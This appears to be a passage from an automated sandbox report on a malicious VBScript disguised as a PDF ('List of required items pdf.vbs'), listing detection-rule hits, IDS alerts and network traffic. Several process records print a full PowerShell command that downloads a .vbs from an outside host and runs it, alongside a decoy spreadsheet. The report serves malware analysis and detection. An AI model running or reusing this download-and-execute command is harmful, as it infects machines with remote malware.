CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7160, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', ProcessId: 6880, ProcessName: powershell.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", ProcessId: 7160, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7160, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx', ProcessId: 6880, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3984, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-09T13:48:52.651272+010020283713Unknown Traffic192.168.2.84971652.113.195.132443TCP
            2024-12-09T13:49:53.934010+010020283713Unknown Traffic192.168.2.84977813.107.246.63443TCP
            2024-12-09T13:50:03.202315+010020283713Unknown Traffic192.168.2.84980113.107.246.63443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
            Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 209.124.66.28:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.113.195.132:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49778 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49836 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49839 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49840 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2802521885.0000000007BA0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2791552362.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2791552362.0000000006D53000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2791552362.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2791552362.0000000006C80000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
            Source: Joe Sandbox ViewIP Address: 52.113.195.132 52.113.195.132
            Source: Joe Sandbox ViewIP Address: 209.124.66.28 209.124.66.28
            Source: Joe Sandbox ViewASN Name: RAMNODEUS RAMNODEUS
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 52.113.195.132:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49778 -> 13.107.246.63:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49801 -> 13.107.246.63:443
            Source: global trafficHTTP traffic detected: GET /it/it.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.astenterprises.com.pkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /it/Kontrastrigt.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.puneet.aeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ab/List%20of%20required%20items.xlsx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.fornid.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /it/it.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.astenterprises.com.pkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /it/Kontrastrigt.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.puneet.aeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ab/List%20of%20required%20items.xlsx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.fornid.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /config/v2/Office/excel/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7bCA59C53D-E458-431B-8ED4-330B89EFBD36%7d&Application=excel&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b37D1865E-0A26-4CC7-9FFF-2EA6E5257DBE%7d&LabMachine=false HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipIf-None-Match: "enTcjZgT68gctiEaeAXTjCZ0zq0sZZUNL0VDwz0IJG8="User-Agent: Microsoft Office 2014DisableExperiments: falseX-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130Host: ecs.office.com
            Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
